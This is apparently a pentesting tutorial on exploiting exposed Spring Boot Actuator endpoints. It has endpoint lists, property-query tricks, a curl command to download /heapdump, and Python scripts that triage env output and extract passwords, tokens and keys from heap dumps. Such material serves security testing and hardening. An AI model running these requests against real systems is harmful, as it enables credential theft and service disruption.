Spring-Boot
Open-source Java framework used for Spring-based applications
Read this article from Wiz
Actuators
Actuators are Spring Boot's management endpoints. Spring Boot 1.x serves them from the root (/env, /dump, /trace); 2.x and later put them under /actuator/, where by default only /actuator/health (plus /actuator/info on older 2.x releases) is exposed over HTTP without authentication. Anything else has to be enabled explicitly, which developers often do wholesale with management.endpoints.web.exposure.include=*. The ones that matter most:
- /actuator/health and /actuator/info - publicly available by default; enough to confirm Actuator is present.
- /dump or /threaddump - thread dump of the JVM (stack traces and lock state), which can carry request data sitting on a thread's stack.
- /trace or /httptrace - the most recent HTTP requests with their headers, which can include session cookies and bearer tokens.
- /logfile - the application log file.
- /env or /actuator/env - environment variables, configuration properties and system properties.
- /mappings - every URL mapping and handler, i.e. the full route map including undocumented endpoints.
- /heapdump - downloads an HPROF heap dump containing every object in memory, credentials included.
- /shutdown - remote shutdown of the application (POST; only active when management.endpoint.shutdown.enabled=true).
- /restart - remote restart of the application (Spring Cloud).
SecLists has a good wordlist for these paths (Discovery/Web-Content/spring-boot.txt); fuzz it against both the root and the /actuator/ prefix.
Querying tricks
Using property patterns
Individual properties can be requested directly instead of grepping the whole /actuator/env dump. The usual first targets:
spring.datasource.url
spring.datasource.username
spring.datasource.password
You can use these patterns in two ways:
/actuator/env/spring.datasource.password (one property, together with the property source it came from)
/actuator/configprops/spring.datasource (every @ConfigurationProperties bean under that prefix; prefix filtering exists on Spring Boot 2.5 and later, older versions only serve the whole /actuator/configprops)
Caveat: Spring Boot 2.x masks values as ****** when the key ends in password, secret, key or token or contains credentials, and 3.x masks every value unless management.endpoint.env.show-values (and management.endpoint.configprops.show-values) is set to ALWAYS or WHEN_AUTHORIZED. A masked entry still confirms that the property exists and where it is defined; the plaintext usually has to come from /heapdump.
Environment variables
The same properties are often injected as environment variables. Spring Boot's relaxed binding derives the variable name from the canonical property name by:
- replacing dots with underscores
- removing any dashes
- converting to uppercase
so spring.datasource.password becomes SPRING_DATASOURCE_PASSWORD and spring.main.log-startup-info becomes SPRING_MAIN_LOGSTARTUPINFO. The env endpoint lists the systemEnvironment property source under these names, so query both spellings:
/actuator/env/SPRING_DATASOURCE_PASSWORD
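The relaxed-binding rules above and the two lookup forms from the previous section, as an added example that is not code from the original page: a helper that turns a canonical property name into its environment-variable spelling (including the documented handling of [i] index markers) and lists every actuator path worth requesting for it. Function names and the path list are my own choices.

```python
# Spring Boot relaxed binding: canonical property name -> environment variable name,
# plus the actuator paths worth requesting for that property.
# Added example for this page; function names and the path list are my own choices.

def property_to_env(prop: str) -> str:
    """spring.datasource.password -> SPRING_DATASOURCE_PASSWORD
    Rules (Spring Boot docs): '[i]' index markers become '_i', dots become
    underscores, dashes are removed, the result is upper-cased."""
    name = prop.replace("[", "_").replace("]", "")
    name = name.replace(".", "_").replace("-", "")
    return name.upper()


def candidate_paths(prop: str, base: str = "/actuator") -> list[str]:
    """Every spelling of a property lookup that an actuator may answer:
    dotted form, env-var form, the configprops prefix, and the 1.x root layout."""
    prefix = prop.rsplit(".", 1)[0] if "." in prop else prop
    return [
        f"{base}/env/{prop}",                    # 2.x/3.x, dotted property name
        f"{base}/env/{property_to_env(prop)}",   # systemEnvironment source spelling
        f"{base}/configprops/{prefix}",          # whole @ConfigurationProperties group
        f"/env/{prop}",                          # Spring Boot 1.x (no /actuator prefix)
    ]


if __name__ == "__main__":
    for p in ("spring.datasource.password", "spring.main.log-startup-info", "my.service[0].other"):
        print(p, "->", property_to_env(p))
    print("\n".join(candidate_paths("spring.datasource.password")))
```

Query both spellings: the dotted lookup resolves through relaxed binding, but the upper-case form is what the operator actually set in the container or systemd unit, and it is the string you will later grep for in a heap dump.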
Enumeration
Configuration discovery with /actuator/env
Pull the full dump once and look for interesting patterns:
- Database properties (spring.datasource.*)
- Security properties (spring.security.*)
- Cloud properties (spring.cloud.*)
Then request the individual entries:
GET /actuator/configprops/spring.datasource
GET /actuator/env/spring.datasource.url
GET /actuator/env/spring.datasource.username
GET /actuator/env/spring.datasource.password
GET /actuator/env/app.admin.username
GET /actuator/env/app.admin.password
The Spring Cloud Config client settings deserve a separate look: the Config Server usually holds every environment's secrets, and these properties carry the credentials used to fetch them:
"spring.cloud.config.uri"
"spring.cloud.config.username"
"spring.cloud.config.password"
Try different content types
If a request is refused or comes back in an unexpected shape, vary the Accept header; the actuator answers with its own vendor media type as well as plain JSON:
Accept: application/vnd.spring-boot.actuator.v3+json
Accept: application/vnd.spring-boot.actuator.v2+json
Accept: application/json
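The /actuator/env triage described under Enumeration above, as an added example that is not code from the original page: parse a saved response, keep the entries whose key matches the database, security, cloud and credential patterns, note which values the Sanitizer has masked, and build the follow-up requests. The JSON is a constructed sample in the Spring Boot 2.x/3.x response shape, and the key patterns are my assumption to extend per target.

```python
import json
import re

# Constructed sample in the shape of a Spring Boot 2.x/3.x /actuator/env response
# (not taken from any real target).
SAMPLE_ENV = json.loads(r"""
{
  "activeProfiles": ["prod"],
  "propertySources": [
    {"name": "server.ports",
     "properties": {"local.server.port": {"value": 8080}}},
    {"name": "systemEnvironment",
     "properties": {
       "PATH": {"value": "/usr/local/bin:/usr/bin"},
       "SPRING_DATASOURCE_PASSWORD": {"value": "******",
         "origin": "System Environment Property \"SPRING_DATASOURCE_PASSWORD\""}}},
    {"name": "Config resource 'class path resource [application.yml]'",
     "properties": {
       "spring.datasource.url": {"value": "jdbc:postgresql://db:5432/app"},
       "spring.datasource.username": {"value": "app"},
       "spring.datasource.password": {"value": "******"},
       "spring.cloud.config.uri": {"value": "http://config:8888"},
       "app.admin.username": {"value": "admin"},
       "app.admin.password": {"value": "******"}}}
  ]
}
""")

# Keys worth a second look. This list is my assumption, not Spring's sanitizer list;
# extend it per target.
INTERESTING = re.compile(
    r"^spring\.(datasource|security|cloud)"
    r"|password|passwd|secret|token|credential|api[._-]?key|admin",
    re.I,
)


def normalize_key(key: str) -> str:
    """Fold the env-var spelling onto the dotted one so one regex covers both
    (SPRING_DATASOURCE_PASSWORD -> spring.datasource.password)."""
    return key.lower().replace("_", ".")


def is_masked(value) -> bool:
    """Spring Boot's Sanitizer replaces values it considers sensitive with ******."""
    return isinstance(value, str) and value != "" and set(value) == {"*"}


def triage_env(doc: dict) -> list[dict]:
    """Walk every property source and keep entries whose key looks interesting."""
    hits = []
    for source in doc.get("propertySources", []):
        for key, entry in source.get("properties", {}).items():
            if not INTERESTING.search(normalize_key(key)):
                continue
            value = entry.get("value")
            hits.append({
                "source": source.get("name"),
                "key": key,
                "value": value,
                "masked": is_masked(value),
                "origin": entry.get("origin"),
            })
    return hits


def follow_ups(hits: list[dict], base: str = "/actuator") -> list[str]:
    """Next requests: per-property lookups for the masked entries, then the
    configprops group for every prefix seen (dotted keys only)."""
    paths = [f"{base}/env/{h['key']}" for h in hits if h["masked"]]
    prefixes = sorted({h["key"].rsplit(".", 1)[0] for h in hits if "." in h["key"]})
    return paths + [f"{base}/configprops/{p}" for p in prefixes]


if __name__ == "__main__":
    found = triage_env(SAMPLE_ENV)
    for h in found:
        flag = "MASKED" if h["masked"] else "plain "
        print(f"{flag} {h['key']} = {h['value']!r}  ({h['source']})")
    print("\n".join(follow_ups(found)))
```

On 2.x the per-property lookup goes through the same Sanitizer, so a masked value stays masked; the follow-up requests mostly tell you which source defines it (origin is often a file path or the name of the Config Server). On 3.x every value is masked unless show-values is set, and /heapdump becomes the place to recover the plaintext.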
CVE-2025-48927 - /heapdump exposed (Initialization of a Resource with an Insecure Default)
curl -X GET http://IP/actuator/heapdump -o heapdump.hprof
Check the first bytes before analysing: an HPROF file starts with the text JAVA PROFILE, while 1f 8b means the endpoint served a gzip stream that has to be decompressed first. Taking the dump pauses the JVM while it is written, so expect the application to stall.
Use VisualVM (or Eclipse MAT) to look at the dump comfortably: load the .hprof and search the String and char[] instances for jdbc:, password and token values.
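A first pass over the downloaded heap dump without a GUI, as an added example that is not code from the original page or from the product the CVE refers to. It pulls printable runs in both encodings a Java heap holds text in, Latin-1 (compact strings and byte[] data) and big-endian UTF-16 (char[] contents in HPROF), then runs a few secret-shaped patterns over them. The blob is a constructed stand-in for a real .hprof file, and the patterns are my assumption to extend per target.

```python
import re
import sys

# Constructed stand-in for a downloaded .hprof: an HPROF header, some filler
# bytes, and strings the way a JVM heap holds them (not data from any real dump).
SAMPLE_HEAP = (
    b"JAVA PROFILE 1.0.2\x00"
    + b"\x00\x00\x00\x08\x01\x02\x03\x04\x05\x06\x07\x08"
    # Java 9+ compact strings / byte[]: Latin-1, one byte per char
    + b"jdbc:postgresql://db:5432/app?user=app&password=Hunter2!" + b"\x00\x00\x0c\xfe"
    # char[] contents in HPROF are big-endian UTF-16; plain `strings` misses these
    + "jdbc:mysql://10.0.0.5:3306/prod".encode("utf-16-be") + b"\x00\x00\x07"
    + "AKIAIOSFODNN7EXAMPLE".encode("utf-16-be") + b"\xff"
    + b"Bearer eyJhbGciOiJIUzI1NiJ9.e30.abc" + b"\x00"
)

# Shapes of secrets worth pulling out first (assumption; extend per target).
SECRET_PATTERNS = [
    re.compile(r"jdbc:[a-z0-9]+://[^\s\"']+", re.I),
    re.compile(r"(?:password|passwd|secret|token)=[^\s\"',;&]+", re.I),
    re.compile(r"Bearer [A-Za-z0-9._-]+"),
    re.compile(r"AKIA[0-9A-Z]{16}"),
]


def extract_strings(blob: bytes, min_len: int = 8):
    """Yield (encoding, text) for printable runs in both encodings a Java heap uses."""
    latin1 = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16be = re.compile(rb"(?:\x00[\x20-\x7e]){%d,}" % min_len)
    for m in latin1.finditer(blob):
        yield "latin1", m.group().decode("latin-1")
    for m in utf16be.finditer(blob):
        yield "utf16be", m.group().decode("utf-16-be")


def find_secrets(blob: bytes, min_len: int = 8) -> list[tuple[str, str]]:
    """Run the secret patterns over every extracted string; de-duplicated, in order found."""
    hits: list[tuple[str, str]] = []
    for enc, text in extract_strings(blob, min_len):
        for pat in SECRET_PATTERNS:
            for m in pat.finditer(text):
                item = (enc, m.group(0))
                if item not in hits:
                    hits.append(item)
    return hits


if __name__ == "__main__":
    # Usage: python heap_triage.py heapdump.hprof   (no argument: run on the sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_HEAP
    for enc, secret in find_secrets(data):
        print(f"[{enc}] {secret}")
```

The shell equivalent is two passes of GNU strings, one for each encoding: `strings -a heapdump.hprof` for Latin-1 and `strings -a -e b heapdump.hprof` for 16-bit big-endian, each piped through `grep -iE 'jdbc:|password|token'`. Real dumps run to hundreds of megabytes, so read them once and keep the patterns tight; anything the first pass turns up is then located precisely in VisualVM or MAT.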